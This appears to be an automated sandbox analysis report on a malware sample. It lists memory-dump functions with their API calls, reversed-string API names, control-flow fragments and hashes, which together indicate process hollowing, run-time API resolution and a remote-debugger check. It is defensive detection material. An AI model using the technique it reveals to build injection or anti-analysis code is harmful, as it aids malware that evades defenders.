                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2348010673.0000000002CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CE1000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_2ce1000_Juqmtmya.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AddressAllocateHandleMemoryModuleProcVirtual
                                                                                                                                                                                                                                                                                                                                  • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                                                                                                                                                                                                                                  • API String ID: 421316089-445027087
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 0215fbc86a319ee40c9455cba9f9b73ffcfc641069feacd49dede573bc387960
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 522154eb7002021d6ca6064316f4891bf1ba3852fcf6d1c52d11761d8e2fe35a
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0215fbc86a319ee40c9455cba9f9b73ffcfc641069feacd49dede573bc387960
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 81116975680308BFEB94EFA4EC41EAEB7AEEB48B00F414460FA01D7200D630EE04DB60
                                                                                                                                                                                                                                                                                                                                  Function 02CF7A2C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51memorynativeCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 12928 2cf7a2c-2cf7a47 12929 2cf7a51-2cf7a56 12928->12929 12930 2cf7a4c call 2ce4530 12928->12930 12932 2cf7a2e-2cf7a4c call 2ce4530 12929->12932 12933 2cf7a58-2cf7ac2 call 2cf798c call 2ce47ec call 2ce49a0 call 2cf81cc call 2cf8274 NtAllocateVirtualMemory call 2ce4500 12929->12933 12930->12929 12932->12929
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02CF81CC: GetModuleHandleA.KERNELBASE(?), ref: 02CF821E
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02CF8274: GetProcAddress.KERNEL32(?,?), ref: 02CF82D9
                                                                                                                                                                                                                                                                                                                                  • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02CF7A9F
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2348010673.0000000002CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CE1000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_2ce1000_Juqmtmya.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AddressAllocateHandleMemoryModuleProcVirtual
                                                                                                                                                                                                                                                                                                                                  • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                                                                                                                                                                                                                                  • API String ID: 421316089-445027087
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 737c5df727d7dab3c98797be01dcf4a13940e284111c4f2f85995c6923c094f1
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: b46f6b96a56e59913b95e95c419267f80c7eb1e6083ef3316229fb48c3b0eb3d
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 737c5df727d7dab3c98797be01dcf4a13940e284111c4f2f85995c6923c094f1
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 88116975680308BFEB94EFA4EC41EAEB7AEEB48B00F414460FA01D7200D630AE04DB60
                                                                                                                                                                                                                                                                                                                                  Function 02CF8400 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50nativeCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02CF81CC: GetModuleHandleA.KERNELBASE(?), ref: 02CF821E
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02CF8274: GetProcAddress.KERNEL32(?,?), ref: 02CF82D9
                                                                                                                                                                                                                                                                                                                                  • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02CF8471
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2348010673.0000000002CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CE1000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_2ce1000_Juqmtmya.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AddressHandleMemoryModuleProcReadVirtual
                                                                                                                                                                                                                                                                                                                                  • String ID: ntdll$yromeMlautriVdaeRtN
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2004920654-737317276
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 0dd66e1c0c6fb7341cc41d1a7288c195bfdcd068c77673adf7d797bf7ebe26c6
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 21baff5960e4041f13ea19bb34894a45ca1eacdabcb64f4bb54ff3e470a6b0d2
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0dd66e1c0c6fb7341cc41d1a7288c195bfdcd068c77673adf7d797bf7ebe26c6
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 17014875640308AFEB94EFA8DC51E9EBBAEFB49704F518560FA05D7700D634AE10DB24
                                                                                                                                                                                                                                                                                                                                  Function 02CF7D78 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49nativeCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02CF81CC: GetModuleHandleA.KERNELBASE(?), ref: 02CF821E
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02CF8274: GetProcAddress.KERNEL32(?,?), ref: 02CF82D9
                                                                                                                                                                                                                                                                                                                                  • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02CF7DEC
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2348010673.0000000002CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CE1000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_2ce1000_Juqmtmya.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AddressHandleMemoryModuleProcVirtualWrite
                                                                                                                                                                                                                                                                                                                                  • String ID: Ntdll$yromeMlautriVetirW
                                                                                                                                                                                                                                                                                                                                  • API String ID: 4260932595-3542721025
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 51bcaae6bebb1255963c08d8084c285a80529a1a1985fcb8ea3eeb30f3a437d1
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 5cf171f8720d611ea8ae2d8ce9cc5d83c7b4278265216fb7a4008d0497fa8527
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 51bcaae6bebb1255963c08d8084c285a80529a1a1985fcb8ea3eeb30f3a437d1
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2D018C75640248AFEB94EF98DC45E9EB7EEEB49700F504861FA01D7700D630AD18DB60
                                                                                                                                                                                                                                                                                                                                  Function 02CF8670 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43nativeCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02CF81CC: GetModuleHandleA.KERNELBASE(?), ref: 02CF821E
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02CF8274: GetProcAddress.KERNEL32(?,?), ref: 02CF82D9
                                                                                                                                                                                                                                                                                                                                  • NtUnmapViewOfSection.NTDLL(?,?), ref: 02CF86D5
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2348010673.0000000002CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CE1000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_2ce1000_Juqmtmya.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AddressHandleModuleProcSectionUnmapView
                                                                                                                                                                                                                                                                                                                                  • String ID: noitceSfOweiVpamnUtN$ntdll
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2801472262-2520021413
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 17309495039ef52be753573d2b592a5eb6b4f7198fbef1d75d7a55439dd287a6
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 3ff146dde65ec4b57731ab8681f90614c5c792747748355adf2cfd16b1202d67
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 17309495039ef52be753573d2b592a5eb6b4f7198fbef1d75d7a55439dd287a6
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F4016D74A40308AFEB94EFA4DC45F5EB7AEEB49B00F514661FA0197600DA34BE00DA68
                                                                                                                                                                                                                                                                                                                                  Function 02CF86F7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35nativeCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02CF81CC: GetModuleHandleA.KERNELBASE(?), ref: 02CF821E
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02CF8274: GetProcAddress.KERNEL32(?,?), ref: 02CF82D9
                                                                                                                                                                                                                                                                                                                                  • NtUnmapViewOfSection.NTDLL(?,?), ref: 02CF86D5
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2348010673.0000000002CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CE1000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_2ce1000_Juqmtmya.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AddressHandleModuleProcSectionUnmapView
                                                                                                                                                                                                                                                                                                                                  • String ID: ntdll
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2801472262-3337577438
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 1413ff88f7a780f1f6532d96a71bb8cee161228bd6d01bb8b97c84163550d5f2
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 39fd4aa8412afabeea4abe77200985179a6f79d1617d02a6d113945a5f3a7f15
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1413ff88f7a780f1f6532d96a71bb8cee161228bd6d01bb8b97c84163550d5f2
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EFF06234A40208AFEF84FBB4E84599DB7FAEF48300B4546A5E54597200DA30AE04DF14
                                                                                                                                                                                                                                                                                                                                  Function 02CF8788 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62processCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02CF81CC: GetModuleHandleA.KERNELBASE(?), ref: 02CF821E
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02CF8274: GetProcAddress.KERNEL32(?,?), ref: 02CF82D9
                                                                                                                                                                                                                                                                                                                                  • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02CF8814
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2348010673.0000000002CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CE1000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_2ce1000_Juqmtmya.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AddressCreateHandleModuleProcProcessUser
                                                                                                                                                                                                                                                                                                                                  • String ID: CreateProcessAsUserW$Kernel32
                                                                                                                                                                                                                                                                                                                                  • API String ID: 4105707577-2353454454
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 3d6cf129979a599efc12236b93f34e275ad636ab6fa6eb28b568e22c75e07b8f
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: a5d9c4221360eebbe2993c05f494bc1a399aff37abe7896457c9298384a5e39c
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3d6cf129979a599efc12236b93f34e275ad636ab6fa6eb28b568e22c75e07b8f
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5E11F0B2640248BFEB90EFA8DC81F9A77EDEB0CB04F514560FA08E3200C634ED109B24
                                                                                                                                                                                                                                                                                                                                  Function 02CFF744 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 12992 2cff744-2cff75e call 2ce668c 12995 2cff78a-2cff792 12992->12995 12996 2cff760-2cff772 call 2ce6694 12992->12996 12996->12995 12999 2cff774-2cff784 CheckRemoteDebuggerPresent 12996->12999 12999->12995 13000 2cff786 12999->13000 13000->12995
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02CFF77D
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2348010673.0000000002CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CE1000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_2ce1000_Juqmtmya.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: CheckDebuggerPresentRemote
                                                                                                                                                                                                                                                                                                                                  • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3662101638-539270669
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 60b82e5b1d5f32b781d2398a49d64777b28ee920d0c39bb615cf0f00ef0bd1e0
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 4a58f144545b5e6f99a84ffabc964c80f5d45f9268a2f81d6c7409788f86ca37
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 60b82e5b1d5f32b781d2398a49d64777b28ee920d0c39bb615cf0f00ef0bd1e0
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 60F0A77090424CBAEB90A6B888887DCFBBDDB15328F3443D99535A25D1E7750740CA51

                                                                                                                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                                                                                                                  Function 02CF8338 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02CF81CC: GetModuleHandleA.KERNELBASE(?), ref: 02CF821E
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02CF8274: GetProcAddress.KERNEL32(?,?), ref: 02CF82D9
                                                                                                                                                                                                                                                                                                                                  • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02CF83C2), ref: 02CF83A4
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2348010673.0000000002CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CE1000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_2ce1000_Juqmtmya.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AddressCacheFlushHandleInstructionModuleProc
                                                                                                                                                                                                                                                                                                                                  • String ID: FlushInstructionCache$Kernel32
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2392256011-184458249
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 9c446e680efd0c1e61f0e633ba5e5c9d4a241c3ba86045c925c818ea418e4b1b
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 21567a5beb4d0b9c2dcec06b8ecbe9dd59fd92fa81ef89e6117beb2eaec4a64e
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9c446e680efd0c1e61f0e633ba5e5c9d4a241c3ba86045c925c818ea418e4b1b
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C301A971780308AFEB94EFA4DC01F9AB7EEEB09B00F514560FA04D2314C630AD14AA24
                                                                                                                                                                                                                                                                                                                                  Function 02CF8274 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,?), ref: 02CF82D9
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2348010673.0000000002CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CE1000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_2ce1000_Juqmtmya.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AddressProc
                                                                                                                                                                                                                                                                                                                                  • String ID: Kernel32$sserddAcorPteG
                                                                                                                                                                                                                                                                                                                                  • API String ID: 190572456-1372893251
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: a1cde36c335342018255f634d94957467e07f6d26e7f2264a1511b9f27793766
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: b5cff6d54a2c2cc23c9c3477cd545e2bd6e9ced7b290235e452644164b1fc60f
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a1cde36c335342018255f634d94957467e07f6d26e7f2264a1511b9f27793766
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0201A274740308AFEB54EBA4DC41E5EB7AEEB49B00F514460F901D7700D630AD04DA24
                                                                                                                                                                                                                                                                                                                                  Function 02CF81CC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02CF8274: GetProcAddress.KERNEL32(?,?), ref: 02CF82D9
                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNELBASE(?), ref: 02CF821E
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2348010673.0000000002CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CE1000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_2ce1000_Juqmtmya.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                                                                                                  • String ID: AeldnaHeludoMteG$KernelBASE
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1646373207-1952140341
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 0cae682d7d08b1cbc425a50ff24455eb438b3ba12a6b42d8560ba28fc3956c74
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 630f8a0a3a0ed0ae59fbcc379416e9a1acdb822f4e5d8571a8b6df8e5321cf1c
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0cae682d7d08b1cbc425a50ff24455eb438b3ba12a6b42d8560ba28fc3956c74
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E6F09070A84708AFEB94EFA4DC55D5AB7EEEB4A700B514960FA01D3710D630BE10EA24